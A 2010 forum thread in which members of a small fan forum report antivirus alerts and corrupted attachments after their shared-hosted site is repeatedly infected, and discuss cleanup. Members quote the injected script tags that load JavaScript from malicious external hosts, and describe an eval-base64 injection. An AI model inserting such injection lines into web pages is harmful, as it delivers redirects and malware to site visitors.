My anti virus program keeps saying there's a virus here.

Peardian · May 03, 2010, 11:48:22 AM

Unless you've reuploaded it, I can see yours just fine.

It seems almost all of the attachments in the Platinum thread are corrupted, so I'm wondering if it didn't corrupt almost all images.

Revned · May 03, 2010, 12:12:11 PM

Maybe your browser attempts to display the corrupted PNG where mine just gives up. I saved it to my hard drive and none of my viewers will display it.

JonLeung · May 03, 2010, 12:22:56 PM

I recently backed up the attachments (a few days ago - but don't think that's related - or at least I hope not), so shouldn't reuploading the contents of the "attachments" folder fix them? When I get home I'll give that a shot.

Though I'm more concerned about something more critical or irreplaceable being corrupted, and if whatever's causing the corruption is still around.

Peardian · May 03, 2010, 02:26:15 PM

Quote from: Revned on May 03, 2010, 12:12:11 PM
Maybe your browser attempts to display the corrupted PNG where mine just gives up. I saved it to my hard drive and none of my viewers will display it.

Oh, NOW it's broken. I hate the way this browser uses its cache.

bustin98 · May 03, 2010, 04:34:50 PM

As long as the site is on a shared server, the possibility of this happening again is always going to exist. And its not a matter of forum software, just a matter of root security. The problem was that a script pasted eval(base64(decode()) into every page in the forum. I'm surprised it didn't go higher into the main site, but it may have just been targeting the forum itself.

Revned · May 12, 2010, 01:08:41 AM

It has happened again

Maxim · May 12, 2010, 03:20:13 AM

The bottom of the page contains:

<script src="http://holasionweb.com/oo.php"></script>

...which serves some javascript that uses a cookie to redirect once to suitcase52td.net which is totally blocked for me...

bustin98 · May 12, 2010, 07:26:20 AM

Fixed

The Ultimate Koopa · May 20, 2010, 02:48:39 PM

Danger: AVG Active Surf-Shield has detected active threats on this page and has blocked access for your protection.
The page you are trying to access has been identified as a known exploit, phishing, or social engineering web site and therefore has been blocked for your safety. Without protection, such as that in the AVG Security Toolbar and AVG, your computer is at risk of being compromised, corrupted or having your identity stolen. Please follow one of the suggestions below to continue.

URL: losotrana.com/js.php
Name: Virus found JS/Redir

That's what I'm getting now.

TerraEsperZ · May 20, 2010, 03:03:27 PM

Same thing for me. Every page on the forum causes Avast to report that trojan horse...

Revned · May 20, 2010, 03:37:02 PM

I'm of the opinion that the problem isn't that this site is on a shared server, but that something is attacking externally. None of this was happening until the captcha was changed, and only the forums are targeted. If the server admins are worth anything they keep each site in private directories.

[EDIT] Nevermind, it appears that it definitely is a problem with GoDaddy. Lots of other people with different software are experiencing this. I guess we'll just have to wait it out.

Just a thought -- if the base64_decode command is getting pasted at the very end of the php file, what if you (bustin98) just stick an exit() at the end? That way anything after that point will be ignored, should this happen again.

bustin98 · May 20, 2010, 07:31:01 PM

Its at the beginning of the file. Wish there was something I could put in to kill it. I changed permissions on the files but that didn't do a thing, and it wouldn't if the source was above the basic web user. Need to just get off the shared server, or on one that has better security.

bustin98 · May 21, 2010, 11:19:28 PM

Well, did a deep cleaning of the site, found a random file that may be the cause or a cause the infection. Got rid of it. I also renamed the cookie name, so sorry about causing everyone to have to log back in...

Seems the infection is self replicating and all it had to do is get in once. Every time someone hit an infected page, it ran through the site and added the code if it didn't already exist.

Maybe now things can go back to normal.??

marioman · September 17, 2010, 05:56:55 PM

It's happened again. The following script has been added to the forum code.

<script src="http://myblindstudioinfoonline.com/ll.php"></script>

Those without reliable virus protection beware.

Peardian · September 17, 2010, 07:32:23 PM

Uh oh. For some reason, I'm not getting any kind of warning and nothing is happening. I hope this gets taken care of before something does.